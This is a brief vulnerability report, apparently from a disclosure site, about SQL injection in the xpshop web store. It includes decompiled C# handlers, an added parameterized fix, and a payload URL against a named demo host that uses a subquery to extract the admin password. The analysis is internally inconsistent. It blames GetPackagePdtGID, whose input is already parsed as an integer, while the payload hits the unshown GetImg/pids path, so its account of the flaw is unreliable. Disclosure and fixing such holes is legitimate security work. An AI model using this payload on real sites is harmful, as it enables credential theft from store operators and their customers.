SQL injection in the xpshop online-store system (demo)

Category: Vulnerability Era
Summary

Vulnerability location: xpshop.webui.MyRefund. Following the function GetPackagePdtGID: the input is not filtered, goes straight into the database, and is echoed back directly!


Author: 不能忍

Details:

Vulnerability location: xpshop.webui.MyRefund

protected void Page_Load(object sender, EventArgs e)
{
    if (Utils.request(base.Request.QueryString["type"]) && Utils.request(base.Request.QueryString["Action"]))
    {
        string text = base.Request.QueryString["Action"];
        if (text != null)
        {
            if (!(text == "GetImg"))
            {
                if (text == "GetPackageGID")
                {
                    // PackagePID is parsed with int.Parse and passed to GetPackagePdtGID;
                    // the return value is written straight into the response
                    base.Response.Write(new ProductDB().GetPackagePdtGID(int.Parse(base.Request.QueryString["PackagePID"])));
                }
            }
            else
            {
                // the raw pids query-string value is handed to GetImg unchanged
                this.GetImg(base.Request.QueryString["pids"]);
            }
        }
    }
}

Following the function GetPackagePdtGID:

public int GetPackagePdtGID(int productID)
{
    // the SQL text is assembled by string concatenation; no parameters are used
    object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text,
        "select GoodsID from Goods where ProductID = " + productID, null);
    return (obj != null) ? ((int)obj) : 0;
}


Not filtered, straight into the database, echoed back directly!
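As an added example that is not part of the original report or the xpshop code base: the same lookup rewritten so that the request value is validated as an integer and travels to SQL Server as a typed parameter instead of being concatenated into the query text. System.Data.SqlClient and a caller-supplied connection string are assumptions; the table and column names are the ones shown above.

```csharp
// Added example (not xpshop's own code): parameterized version of the lookup.
using System;
using System.Data;
using System.Data.SqlClient; // assumption: classic ADO.NET SqlClient is available

public static class SafeProductLookup
{
    // Same query as GetPackagePdtGID, but ProductID is bound as an integer
    // parameter, so request text never becomes part of the SQL statement.
    public static int GetPackagePdtGID(string connectionString, int productID)
    {
        const string sql = "select GoodsID from Goods where ProductID = @ProductID";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@ProductID", SqlDbType.Int).Value = productID;
            conn.Open();
            object obj = cmd.ExecuteScalar();
            // ExecuteScalar returns null for no rows and DBNull for a NULL column
            return (obj != null && obj != DBNull.Value) ? (int)obj : 0;
        }
    }

    // Query-string values are untrusted text. TryParse rejects anything that is
    // not a positive integer without throwing, unlike the int.Parse call in
    // Page_Load, and the same check should guard any other id parameter such as
    // pids before it is used in a query.
    public static bool TryReadId(string raw, out int id)
    {
        return int.TryParse(raw, out id) && id > 0;
    }

    // Example handler flow (assumed shape): validate first, then query.
    public static string HandleGetPackageGID(string connectionString, string rawPackagePID)
    {
        int packagePID;
        if (!TryReadId(rawPackagePID, out packagePID))
            return string.Empty; // reject malformed input instead of echoing a DB error
        return GetPackagePdtGID(connectionString, packagePID).ToString();
    }
}
```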

payload:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--

Proof of vulnerability:

http://clothes.xpshop.cn/preview.aspx?type=1&Action=GetImg&pids=1 and 1=(select top 1 password from admin)--
